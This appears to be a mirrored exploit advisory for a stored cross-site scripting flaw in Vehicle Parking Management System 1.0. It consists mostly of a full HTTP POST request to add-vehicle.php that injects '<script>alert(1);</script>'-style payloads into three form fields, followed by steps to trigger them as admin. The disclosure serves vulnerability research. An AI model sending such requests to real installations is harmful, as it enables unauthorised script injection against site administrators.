Home Tools Exploits & CVE's Vehicle Parking Management System 1.0 Cross Site Scripting

Vehicle Parking Management System 1.0 Cross Site Scripting

July 22, 2021

690

Vehicle Parking Management System version 1.0 suffers from a persistent cross site scripting vulnerability. Original discovery of persistent cross site scripting in this version is attributed to Tushar Vaidya in February of 2021.

Change Mirror Download

# Exploit Title: Vehicle Parking Management System -  Stored Cross-Site-Scripting (XSS)
# Date: 2021-07-09
# Exploit Author: faisalfs10x (https://github.com/faisalfs10x)
# Vendor Homepage: https://phpgurukul.com
# Software Link: https://phpgurukul.com/vehicle-parking-management-system-using-php-and-mysql/
# Version: 1.0
# Tested on: Windows 10, XAMPP


################
# Description  #
################

# The system is vulnerable to Stored XSS on add-vehicle.php endpoint.


########
# PoC  #
########


PoC ) param vehcomp,vehreno,ownername - Stored XSS
Payload: 1;<script>alert(1);</script>
Request: 
========

POST /vpms/add-vehicle.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------39455081863880051020862918006
Content-Length: 842
Origin: http://localhost
DNT: 1
Connection: close
Referer: http://localhost/vpms/add-vehicle.php
Cookie: PHPSESSID=01nt1pa7lgtioktv5ii907c8l3
Upgrade-Insecure-Requests: 1
Sec-GPC: 1

-----------------------------39455081863880051020862918006
Content-Disposition: form-data; name="catename"

Bicycles
-----------------------------39455081863880051020862918006
Content-Disposition: form-data; name="vehcomp"

1;<script>alert(1);</script>
-----------------------------39455081863880051020862918006
Content-Disposition: form-data; name="vehreno"

2;<script>alert(2);</script>
-----------------------------39455081863880051020862918006
Content-Disposition: form-data; name="ownername"

3;<script>alert(3);</script>
-----------------------------39455081863880051020862918006
Content-Disposition: form-data; name="ownercontno"

7627637673
-----------------------------39455081863880051020862918006
Content-Disposition: form-data; name="submit"


-----------------------------39455081863880051020862918006--


############
# Fire up  #
############

1) Goto: Login as Admin
2) Goto: Manage Vehicle -> Manage In Vehicle -> Click view
3) Stored XSS payloads are fired

Vehicle Parking Management System 1.0 Cross Site Scripting

Follow us on Instagram @thecyberpost

EDITOR PICKS

Elber Signum DVB-S/S2 IRD For Radio Networks 1.999 Authentication Bypass

Elber Signum DVB-S/S2 IRD For Radio Networks 1.999 Insecure Direct Object...

Elber Cleber/3 Broadcast Multi-Purpose Platform 1.0.0 Authentication Bypass

POPULAR POSTS

Restaurant Reservation System Patches Easy-to-Exploit XSS Bug

Sniffle – A Sniffer For Bluetooth 5 And 4.X LE

Domhttpx – A Google Search Engine Dorker With HTTP Toolkit Built...

POPULAR CATEGORY

EI Tube YouTube API 3 SQL Injection

Active eCommerce CMS 6.5.0 Cross Site Scripting

Linux munmap() Race Condition / Use-After-Free